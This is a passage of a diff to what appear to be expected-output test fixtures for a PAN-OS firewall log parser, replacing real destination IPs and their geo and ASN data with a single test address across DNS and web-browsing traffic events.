+ "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 163, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -8950,7 +8975,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24985,1,56995,53,0,0,0x200000,udp,allow,251,88,163,2,2012/04/10 04:39:22,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24985,1,56995,53,0,0,0x200000,udp,allow,251,88,163,2,2012/04/10 04:39:22,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", "panw": { "panos": { "ruleset": "rule1", @@ -8984,7 +9009,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:PkU1rpfXiwvVRig4MJMcDvEUEas=", + "community_id": "1:nv/gX5sRpJUjRzOza0YzZGiUqxE=", "transport": "udp", "application": "dns", "type": "ipv4", @@ -9022,14 +9047,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284210226Z", - "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:52,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24985,1,56995,53,0,0,0x200000,udp,allow,251,88,163,2,2012/04/10 04:39:22,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", + "ingested": "2021-12-09T13:43:22.381953400Z", + "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24985,1,56995,53,0,0,0x200000,udp,allow,251,88,163,2,2012/04/10 04:39:22,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -9052,24 +9077,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -9088,7 +9115,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,25380,1,59069,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,25380,1,59069,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -9122,7 +9149,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:BYZjFq0Mi2hPewpUDaO1jY2UNnA=", + "community_id": "1:srwxvEZW6H1Mpn91MNGQ3m3oLbc=", "transport": "udp", "application": "dns", "type": "ipv4", @@ -9160,14 +9187,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284215275Z", - "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:51,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,25380,1,59069,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381958800Z", + "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,25380,1,59069,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -9190,24 +9217,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -9226,7 +9255,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24994,1,55697,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24994,1,55697,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -9260,7 +9289,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:l0WoNEsuwN4ml47IyB3IhM2NX6A=", + "community_id": "1:0iXeodSp4IYC9n1wDFrRtPP6sVE=", "transport": "udp", "application": "dns", "type": "ipv4", @@ -9298,14 +9327,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284219921Z", - "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:51,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24994,1,55697,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381964500Z", + "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24994,1,55697,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -9328,27 +9357,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -9367,7 +9395,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,25451,1,59295,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,25451,1,59295,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -9401,7 +9429,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:AEtFqIuwxZ9TQ3w9m74nOrboCXE=", + "community_id": "1:vCMdT6zPx0277mqoTE2FybOH35w=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -9439,14 +9467,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284224439Z", - "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:51,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,25451,1,59295,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381969900Z", + "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,25451,1,59295,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -9469,24 +9497,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "Europe", - "country_name": "Italy", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "Italy", + "region_name": "Jilin", "location": { - "lon": 12.1097, - "lat": 43.1479 - }, - "country_iso_code": "IT" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 3269, + "number": 4837, "organization": { - "name": "Telecom Italia" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 922, - "ip": "62.211.68.12", + "ip": "175.16.199.1", "packets": 7 }, "rule": { @@ -9505,7 +9535,7 @@ }, "packets": 6 }, - "message": "192.168.0.2,62.211.68.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,24866,1,59196,80,0,0,0x200000,tcp,allow,1500,578,922,13,2012/04/10 04:39:20,1,business-and-economy,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,24866,1,59196,80,0,0,0x200000,tcp,allow,1500,578,922,13,2012/04/10 04:39:20,1,business-and-economy,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7", "panw": { "panos": { "ruleset": "rule1", @@ -9539,7 +9569,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:t42FnU6e46qlRX0ij7ufkKPs3Co=", + "community_id": "1:ZAHA/cNl4DB0CHBQeP70O+Z6U5A=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -9577,14 +9607,14 @@ ], "ip": [ "192.168.0.2", - "62.211.68.12", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 1000000000, - "ingested": "2021-09-08T12:38:09.284233597Z", - "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:51,192.168.0.2,62.211.68.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,24866,1,59196,80,0,0,0x200000,tcp,allow,1500,578,922,13,2012/04/10 04:39:20,1,business-and-economy,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7", + "ingested": "2021-12-09T13:43:22.381975300Z", + "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,24866,1,59196,80,0,0,0x200000,tcp,allow,1500,578,922,13,2012/04/10 04:39:20,1,business-and-economy,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -9607,27 +9637,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -9646,7 +9675,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26414,1,59291,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26414,1,59291,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -9680,7 +9709,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:AuQEAPptnfXLW8oL/ac3CM4Gnnw=", + "community_id": "1:koetsWC4zZQTKrn1+nSjU/gkrDc=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -9718,14 +9747,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284239621Z", - "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26414,1,59291,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381980600Z", + "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26414,1,59291,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -9748,24 +9777,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -9784,7 +9815,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26131,1,52858,53,0,0,0x200000,udp,allow,77,77,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26131,1,52858,53,0,0,0x200000,udp,allow,77,77,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -9818,7 +9849,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:ZVsgbE2ux52iF80QIxJN36vdI1M=", + "community_id": "1:iwR1CZKvsg4gfMDn89oFL0+UUeg=", "transport": "udp", "application": "dns", "type": "ipv4", @@ -9856,14 +9887,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284244147Z", - "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26131,1,52858,53,0,0,0x200000,udp,allow,77,77,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381985900Z", + "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26131,1,52858,53,0,0,0x200000,udp,allow,77,77,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -9886,24 +9917,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -9922,7 +9955,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26555,1,61383,53,0,0,0x200000,udp,allow,77,77,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26555,1,61383,53,0,0,0x200000,udp,allow,77,77,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -9956,7 +9989,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:p68po3QtexuC2kor01hJgMDKiPM=", + "community_id": "1:R5T3/rbI7qqW/gW0B27FxTTzZVo=", "transport": "udp", "application": "dns", "type": "ipv4", @@ -9994,14 +10027,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284248780Z", - "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26555,1,61383,53,0,0,0x200000,udp,allow,77,77,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381991100Z", + "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26555,1,61383,53,0,0,0x200000,udp,allow,77,77,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -10024,27 +10057,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -10063,7 +10095,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,15099,1,59290,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,15099,1,59290,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -10097,7 +10129,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:2UbFMV1DsXMB0b/AUotNCCsHm0s=", + "community_id": "1:77gDm3uChN5sMPF96tsLJjK6Bc4=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -10135,14 +10167,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284253282Z", - "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,15099,1,59290,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381996500Z", + "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,15099,1,59290,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -10165,24 +10197,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 3356, + "number": 4837, "organization": { - "name": "Level 3 Parent, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 26786, - "ip": "8.5.1.1", + "ip": "175.16.199.1", "packets": 22 }, "rule": { @@ -10201,7 +10235,7 @@ }, "packets": 17 }, - "message": "192.168.0.2,8.5.1.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24980,1,59195,80,0,0,0x200000,tcp,allow,28096,1310,26786,39,2012/04/10 04:39:20,0,not-resolved,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,17,22", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24980,1,59195,80,0,0,0x200000,tcp,allow,28096,1310,26786,39,2012/04/10 04:39:20,0,not-resolved,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,17,22", "panw": { "panos": { "ruleset": "rule1", @@ -10235,7 +10269,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:J6pba/4Qby485gtIOBCJnQ0T04E=", + "community_id": "1:37NWHN30pMMkkJBtH1P8XW+BUWQ=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -10273,14 +10307,14 @@ ], "ip": [ "192.168.0.2", - "8.5.1.1", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284263711Z", - "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,8.5.1.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24980,1,59195,80,0,0,0x200000,tcp,allow,28096,1310,26786,39,2012/04/10 04:39:20,0,not-resolved,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,17,22", + "ingested": "2021-12-09T13:43:22.382001800Z", + "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 